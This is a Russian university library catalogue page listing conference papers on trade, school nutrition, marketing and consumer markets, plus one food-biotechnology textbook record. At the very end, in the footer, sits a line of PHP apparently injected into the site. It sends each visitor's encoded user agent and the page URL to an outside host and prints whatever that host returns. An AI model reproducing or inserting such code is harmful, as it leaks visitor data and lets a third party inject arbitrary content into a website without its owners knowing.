КОНКУРЕНЦИЯ -- ПИТАНИЕ -- ШКОЛА -- БОЛЬНИЦА -- БИОПРОДУКТ -- ПОДСЛАСТИТЕЛЬ -- ЦЕНА
Оглавление 
  • Пономарева, Т. М. Правовые условия формирования корпоративной культуры в сфере торговли / Т. М. Пономарева. - с.35-37
    Кл. слова: КУЛЬТУРА КОРПОРАТИВНАЯ, КУЛЬТУРА ТОРГОВЛИ
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
    Кл. слова: ПРОДУКЦИЯ АЛКОГОЛЬНАЯ, БЕЗОПАСНОСТЬ СЫРЬЯ
  • Бураковская, Н. В. Инновационное направление в организации обслуживания на предприятиях индустрии питания / Н. В. Бураковская. - с.293-294
    Кл. слова: ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ, ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Бураковская, Н. В. Современные концепции и совершенствование организации обслуживания в школьных столовых / Н. В. Бураковская. - с.305-306
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, СТОЛОВАЯ ШКОЛЬНАЯ
  • Есипова, М. С. Проектирование рецептуры творожно-растительного пудинга для школьного питания / М. С. Есипова, О. В. Пасько. - с.322-324
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Макарова, О. В. Исследование технологии ферментированного молочно-солодового продукта для питания школьников / О. В. Макарова. - с.341-344
    Кл. слова: ПРОДУКТ МОЛОЧНО-СОЛОДОВЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Пасько, О. В. Целевые научно-практические исследования по оценке состояния и решению проблем школьного питания в г. Омске / О. В. Пасько. - с.346-348
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Шадрин, М. А. Мониторинг организации питания столовой СОШ №105 г. Омска / М. А. Шадрин, М. С. Бурикова. - с.377-379
    Кл. слова: СТОЛОВАЯ ШКОЛЬНАЯ
  • Шадрин, М. А. Питание школьников в Омском регионе: проблемы, перспективы развития / М. А. Шадрин, Л. Г. Германская. - с.380-381
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Волкова, И. А. Стратегические приоритеты технического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
    Кл. слова: СЕЛЬСКОЕ ХОЗЯЙСТВО - РЕГИОН
  • Авдейчикова, Е. В. Проблемы развития удалённой торговли в России / Е. В. Авдейчикова. - с.38-42
  • Баетова, Д. Р. Преимущества торгового финансирования / Д. Р. Баетова, Е. А. Дмитренко. - с.43-45
  • Безбородова, Т. М. Социальная ответственность государства и торгового бизнеса при использовании труда иностранных работников / Т. М. Безбородова. - с.45-49
  • Гончарова, О. В. Международные аспекты пушного бизнеса в первом десятилетии XXI века / О. В. Гончарова. - с.49-54
    Кл. слова: XXI В.
  • Горбунов, П. И. Конкурентное развитие региона на основе стратегического евразийского проекта "Омский Локомотив - М" / П. И. Горбунов, В. В. Лизунов. - с.54-59
  • Елкина, В. Н. Становление территориального бизнес-сообщества как фактор развития малого и среднего бизнеса в условиях инновационной экономики / В. Н. Елкина. - с.59-64
  • Кириллов, Ю. Г. Современное состояние, динамика и перспективы развития внешнеэкономической деятельности Омской области в условиях экономического кризиса / Ю. Г. Кириллов. - с.64-67
  • Коновалов, К. Л. Тезаурус как системная информация для стратегического анализа и развития предпринимательства / К. Л. Коновалов. - с.67-70
  • Кривцов, А. И. Методика оценки эффективности инвестиций в лизинг на основе международной практики / А. И. Кривцов. - с.70-76
  • Лихтарова, О. В. Анализ международной практики правовых аспектов публикуемой отчетности организации / О. В. Лихтарова. - с.77-80
  • Метелев, К. А. Устойчивое развитие региона в условиях ВТО / К. А. Метелев. - с.81-85
  • Метелев, С. Е. Россия в ВТО: условия вступления и первые итоги / С. Е. Метелев, С. Н. Хоботова. - с.85-92
  • Свиридова, Е. А. Сельский туризм: европейский опыт и региональные перспективы / Е. А. Свиридова. - с.92-96
  • Скрипник, Т. В. Фандрайзинг - как это будет по-русски? / Т. В. Скрипник. - с.96-100
  • Шулбаева, М. Т. Просьюмерство как активный стиль жизни / М. Т. Шулбаева, П. Г. Боргояков, К. Л. Коновалов. - с.101-102
    Кл. слова: ПОКУПАТЕЛЬ
  • Болотова, С. С. Требования к качеству и безопасности средств по уходу за волосами / С. С. Болотова. - с.103-105
  • Данилова, Н. В. Качество куриных яиц на потребительском рынке г. Омска / Н. В. Данилова. - с.105-110
  • Королева, Ю. Е. Оценка качества шампуней, реализуемых на Омском потребительском рынке / Ю. Е. Королева. - с.110-113
    Кл. слова: РЫНОК
  • Королева, Ю. Е. Контрафактные и фальсифицированные товары как угроза безопасности на потребительском рынке / Ю. Е. Королева, Н. М. Катаева. - с.113-116
  • Королькова, Л. В. Качество товаров и потребительская экспертиза / Л. В. Королькова. - с.116-119
  • Плохотиков, С. И. К вопросу об экспертизе качества сложных электробытовых товаров / С. И. Плохотиков, А. А. Степанов, О. В. Рогова. - с.119-121
  • Семочкин, А. В. / А. В. Семочкин, Е. В. Корниенко. - с.122-124
  • Судакова, И. К. Исследование безопасности отделочных материалов на поливинилхлоридной основе / И. К. Судакова, Т. В. Котова. - с.124-126
  • Тимохина, Г. С. Соблюдение прав потребителей как основа формирования потребительской лояльности / Г. С. Тимохина. - с.126-129
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
  • Исаев, А. В. Потребительская кооперация Омской области: в содружестве с властью - ради благополучия селян / А. В. Исаев. - с.132-134
  • Польский, В. С. Пути и направления инновационного развития потребительской кооперации на основе проблемно-задачного и системного подходов / В. С. Польский. - с.134-138
  • Иванов, К. К. Инвестиции как основной инструмент долгосрочного планирования / К. К. Иванов, С. С. Мельникова. - с.139-140
  • Миерманова, С. Т. Учетная политика организации в целях бухгалтерского управленческого учета / С. Т. Миерманова. - с.141-142
  • Романенко, Е. В. Особенности развития динамических способностей малого и среднего предпринимательства в сфере торговли Омского региона / Е. В. Романенко. - с.143-147
  • Федотенко, С. А. Особенности осуществления предпринимательской деятельности без образования юридического лица / С. А. Федотенко, Т. А. Чижикова. - с.147-149
  • Черепанова, И. В. Анализ и перспективы развития лицензионного законодательства Российской Федерации / И. В. Черепанова. - с.149-154
  • Бабурина, Т. Н. Гармония образовательных традиций европейских наций как принцип европейского пространства высшего образования / Т. Н. Бабурина. - с.155-157
  • Богданов, А. Н. Формирование фондов оценочных средств как условие реализации ФГОС при профессиональном обучении поваров / А. Н. Богданов, Г. Ф. Авдеева. - с.157-159
  • Власенко, О. В. Реализация принципов в социальной ответственности ВУЗа как условие интеграции в международное образовательное пространство (на примере Омского института (филиала) РГТЭУ) / О. В. Власенко. - с.159-164
  • Гурбо, Н. М. Сертификация профессиональных квалификаций выпускников в региональной системе профессионального образования / Н. М. Гурбо, М. М. Амренова. - с.164-166
  • Забудский, Г. Г. О подготовке специалистов торгово-экономической сферы по методам оптимизации / Г. Г. Забудский. - с.166-168
  • Климова, Э. Н. Коммуникативно-гуманистическая парадигма как основа подготовки специалистов сферы услуг / Э. Н. Климова, А. Н. Аршинова. - с.169-171
  • Кораблева, А. А. Отраслевой и человеческий потенциал в основе экономической безопасности региона / А. А. Кораблева. - с.171-175
  • Куламихина, И. В. Языковая компетенция, как фактор востребованности выпускника / И. В. Куламихина. - с.175-178
  • Мещеряков, В. А. Обучение студентов имитационному моделированию систем массового обслуживания в MATLAB / В. А. Мещеряков, В. П. Денисов, Л. А. Денисова. - с.179-181
  • Сватков, Б. С. Роль профориентации учащихся общеобразовательных школ в подготовке кадров для торговой отрасли Омской области / Б. С. Сватков. - с.181-184
  • Тарасова, Т. Н. Мотивация трудовой деятельности персонала микропредприятий индустрии туризма / Т. Н. Тарасова. - с.184-186
  • Хайрулина, Л. Р. Проблемы стимулирования труда персонала магазинов ООО "Компания Холидей" Омский филиал / Л. Р. Хайрулина. - с.186-189
  • Цыганова, О. А. Взаимодействие вузов и работодателей как механизм повышения качества подготовки молодых специалистов / О. А. Цыганова. - с.189-191
  • Шиповалов, А. Г. Качественные параметры кадрового обеспечения деятельности предприятий потребительского рынка / А. Г. Шиповалов. - с.191-194
  • Шкурко, О. В. Вузовская подготовка лидеров торговых предприятий: проблемы и перспективы / О. В. Шкурко. - с.194-196
  • Архипов, А. Е. Специфика маркетинга услуг: теоретический аспект / А. Е. Архипов, К. А. Лиханов. - с.197-199
  • Архипов, А. Е. Маркетинговые аспекты обеспечения инвестиционной привлекательности регионального туризма / А. Е. Архипов, И. Ю. Севрюков. - с.199-202
  • Бургат, В. В. Продакт плейсмент - современная технология маркетинговых коммуникаций / В. В. Бургат. - с.202-205
  • Вайнер, А. С. Особенности развития малого предпринимательства в сфере потребительских услуг / А. С. Вайнер. - с.206-209
  • Горшков, М. В. Средства электронной коммуникации в прямом маркетинге / М. В. Горшков. - с.209-213
  • Зеркалий, Н. Г. Креативный маркетинг как новая технология для потребительского рынка / Н. Г. Зеркалий. - с.217-221
  • Коваленко, Е. В. Маркетинговые стратегии на этапах жизненного цикла предприятия / Е. В. Коваленко, А. А. Рыбак. - с.224-228
  • Козлова, О. А. Возможности обучения потребителей на рынке инновационных товаров / О. А. Козлова, О. С. Иванова. - с.228-232
  • Медведева, Н. В. ИТ - аутсорсинг для торговых предприятий: теория и практика / Н. В. Медведева. - с.232-233
  • Нижальская, Н. И. Маркетинговый подход к управлению деятельностью предприятий торговли / Н. И. Нижальская, В. Д. Нижальская. - с.234-236
  • Нюренбергер, Л. Б. Современные подходы к реализации маркетинговых коммуникаций коммерческой организации / Л. Б. Нюренбергер, А. В. Курнявкин. - с.236-238
  • Нюренбергер, Л. Б. Корпоративная культура компании как внутренний компонент коммуникаций / Л. Б. Нюренбергер, А. А. Лаптев. - с.238-240
  • Нюренбергер, Л. Б. Управление брендом торгово-развлекательного комплекса / Л. Б. Нюренбергер, Е. Ю. Пятова. - с.241-243
  • Орехов, И. В. Интернет-магазин услуг по аутсорингу ITRUST. Оптимизация бизнес-процессов с целью повышения эффективности и прозрачности взаимоотношений между заказчиками и подрядчиками / И. В. Орехов. - с.243-244
  • Пятова, Е. Ю. Новая парадигма разработки комплекса маркетинговых коммуникаций / Е. Ю. Пятова. - с.249-250
  • Реброва, Н. П. Анализ оборота розничной торговли Омской области за январь - сентябрь 2010 - 2012 годов / Н. П. Реброва, В. М. Седельников. - с.251-254
  • Седова, В. М. Современные тенденции развития рынка туристских услуг / В. М. Седова, А. А. Кучковский. - с.254-258
  • Сухостав, Е. В. Разработка планограммы как ключевого инструмента мерчендайзинга / Е. В. Сухостав. - с.258-260
  • Таминдаров, Р. Т. Защита персональных данных / Р. Т. Таминдаров. - с.260-262
  • Таскаев, Е. Н. Методические основы оценки маркетинговой среды рынка услуг / Е. Н. Таскаев, М. С. Чернова. - с.262-266
  • Хайрулина, Л. Р. Нейромаркетинг как инструмент изучения поведения потребителей / Л. Р. Хайрулина. - с.266-268
  • Хайруллина, М. В. Факторы конкурентоспособности торговых организаций / М. В. Хайруллина, М. А. Нюренбергер. - с.269-272
  • Шарипова, Н. А. Использование event-маркетинга для привлечения клиентов / Н. А. Шарипова. - с.272-274
  • Швец, В. В. Особенности формирования товарного ассортимента в оптовой торговле / В. В. Швец, Н. В. Козырев. - с.274-275
  • Шереметьев, Н. К. Аспекты коммуникационной политики спортивного маркетинга / Н. К. Шереметьев. - с.276-281
  • Али-Аскяри, С. А. Современное состояние и перспективы интеграции форм хозяйствования на региональном рынке потребительских товаров / С. А. Али-Аскяри, В. М. Шкиренко. - с.282-287
  • Али-Аскяри, С. А. Особенности управления ресурсным потенциалом торговых организаций в условиях интеграции / С. А. Али-Аскяри, Х. З. Максудов. - с.287-289
  • Сватков, Б. С. Актуальность информационных технологий, для развития торговли на примере базы "Торговый Лоцман" / Б. С. Сватков. - с.289-291
  • Шкуренко, В. В. Стратегия взаимодействия местных сетей с локальными производителями. Проблемы и перспективы / В. В. Шкуренко. - с.291-292
  • Гурман, В. И. Подходы к оценке инвестиционных проектов для байкальского региона / В. И. Гурман, И. Р. Либенсон, Д. М. Скитневский. - с.297-301
  • Бакаева, В. В. Методический подход к оценке уровня развития торговли региона (города) / В. В. Бакаева, Н. В. Курушина. - с.389-393
  • Волкова, И. А. Стратегические приоритеты технологического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
  • Кычанов, Б. И. Анализ динамики развития розничной торговли в омском регионе / Б. И. Кычанов. - с.399-401
  • Шайтанова, Л. М. Исследование динамики покупной цены товара как одного из параметров развития потребительского рынка / Л. М. Шайтанова, Л. Н. Гончаренко. - с.408-411
14. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3180 - 23.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.97 с.26 запросов, 1.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;